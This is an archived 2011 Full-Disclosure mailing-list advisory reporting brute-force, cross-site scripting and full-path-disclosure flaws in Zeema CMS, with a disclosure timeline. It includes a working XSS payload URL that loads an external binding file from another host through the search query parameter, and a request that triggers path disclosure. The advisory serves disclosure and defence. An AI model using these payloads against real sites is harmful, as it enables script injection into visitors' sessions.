[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <003e01ccb220$60375b80$9b7a6fd5@ml>
Date: Sun, 4 Dec 2011 03:00:42 +0200
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>
Subject: Vulnerabilities in Zeema CMS
Hello list!
I want to warn you about Brute Force, Cross-Site Scripting and Full path
disclosure vulnerabilities in Zeema CMS. It's Ukrainian commercial CMS.
-------------------------
Affected products:
-------------------------
Vulnerable are all versions of Zeema CMS.
----------
Details:
----------
Brute Force (WASC-11):
http://site/cms/
XSS (WASC-08):
http://site/search/?query=%22%20style=%22-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml%23xss)
Attack will work in Mozilla and Firefox.
Full path disclosure (WASC-13):
http://site/search/?page=10&query=site
------------
Timeline:
------------
2011.09.12 - found vulnerabilities during audit. After that client straight
away informed developers.
2011.10.22 - announced at my site.
2011.10.23 - informed developers.
2011.12.02 - disclosed at my site.
I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/5459/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists